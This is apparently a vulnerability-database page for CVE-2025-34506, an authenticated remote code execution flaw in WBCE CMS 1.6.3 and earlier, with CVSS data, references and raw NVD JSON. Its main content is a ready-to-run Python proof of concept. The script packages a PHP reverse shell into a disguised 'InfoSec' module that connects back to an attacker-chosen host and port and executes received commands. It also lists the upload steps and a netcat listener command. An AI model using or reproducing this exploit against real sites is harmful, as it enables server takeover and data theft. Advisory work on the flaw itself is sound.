CVE-2025-34506

Description

WBCE CMS version 1.6.3 and prior contains an authenticated remote code execution vulnerability that allows administrators to upload malicious modules. Attackers can craft a specially designed ZIP module with embedded PHP reverse shell code to gain remote system access when the module is installed.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wbce:wbce_cms:*:*:*:*:*:*:*:* - VULNERABLE

WBCE CMS <= 1.6.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-34506 PoC - WBCE CMS Authenticated RCE via Malicious Module Upload
# This PoC demonstrates how to create a malicious ZIP module for RCE

import zipfile
import os
import sys

def create_malicious_module(output_file, lhost, lport):
    """
    Create a malicious WBCE CMS module ZIP file containing PHP reverse shell
    
    Parameters:
        output_file: Output path for the malicious ZIP module
        lhost: Attacker IP for reverse shell
        lport: Attacker port for reverse shell
    """
    
    # Malicious PHP code that will be executed when module is installed
    php_payload = f'''<?php
// Malicious module info file for CVE-2025-34506
// Reverse shell payload

$ip = "{lhost}";
$port = {lport};

// Create reverse shell connection
$sh = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($sh, $ip, $port);

// Redirect stdin/stdout/stderr to socket
socket_write($sh, "[+] Connection established from target\n");

while ($cmd = @socket_read($sh, 65535, PHP_NORMAL_READ)) {{
    if (trim($cmd) == "exit") {{
        socket_close($sh);
        break;
    }}
    $output = shell_exec($cmd);
    socket_write($sh, $output);
}}
?>'''
    
    # Module structure required by WBCE CMS
    module_info = '''<?xml version="1.0" encoding="UTF-8"?>
<module>
    <name>InfoSec</name>
    <description>Security Information Module</description>
    <function>info_sec</function>
    <type>tool</type>
    <version>1.0</version>
    <platform>WBCE</platform>
</module>'''
    
    try:
        with zipfile.ZipFile(output_file, 'w', zipfile.ZIP_DEFLATED) as zf:
            # Add malicious PHP file as module entry point
            zf.writestr('info.php', php_payload)
            # Add required module XML file
            zf.writestr('module.xml', module_info)
            # Add required info file
            zf.writestr('info.xml', module_info)
            
        print(f"[+] Malicious module created: {output_file}")
        print(f"[+] Target: {lhost}:{lport}")
        print("[*] Steps to exploit:")
        print("    1. Login to WBCE CMS admin panel")
        print("    2. Go to Add-ons -> Modules -> Upload")
        print(f"    3. Upload the malicious ZIP file: {output_file}")
        print("    4. Install the uploaded module")
        print("    5. Start netcat listener: nc -lvp {}".format(lport))
        
    except Exception as e:
        print(f"[-] Error creating module: {e}")
        return False
    
    return True

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python3 cve-2025-34506.py <output.zip> <LHOST> <LPORT>")
        print("Example: python3 cve-2025-34506.py malicious_module.zip 192.168.1.100 4444")
        sys.exit(1)
    
    output_file = sys.argv[1]
    lhost = sys.argv[2]
    lport = sys.argv[3]
    
    create_malicious_module(output_file, lhost, lport)

# Additional reference:
# Exploit-DB: https://www.exploit-db.com/exploits/52132
# GitHub: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-34506
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-34506
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-34506/
[4] VulDB https://vuldb.com/cve/CVE-2025-34506
[5] https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE
[6] https://github.com/WBCE/WBCE_CMS
[7] https://wbce-cms.org/
[8] https://www.exploit-db.com/exploits/52132
[9] https://www.vulncheck.com/advisories/wbce-cms-authenticated-remote-code-execution-via-module-upload
[10] https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-34506", "sourceIdentifier": "[email protected]", "published": "2025-12-11T22:15:53.823", "lastModified": "2025-12-15T18:07:41.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WBCE CMS version 1.6.3 and prior contains an authenticated remote code execution vulnerability that allows administrators to upload malicious modules. Attackers can craft a specially designed ZIP module with embedded PHP reverse shell code to gain remote system access when the module is installed."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wbce:wbce_cms:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.6.3", "matchCriteriaId": "922BCB07-6BC8-448D-9E50-956A87DAF93E"}]}]}], "references": [{"url": "https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/WBCE/WBCE_CMS", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wbce-cms.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/52132", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/wbce-cms-authenticated-remote-code-execution-via-module-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e", "source": "[email protected]", "tags": ["Exploit"]}]}}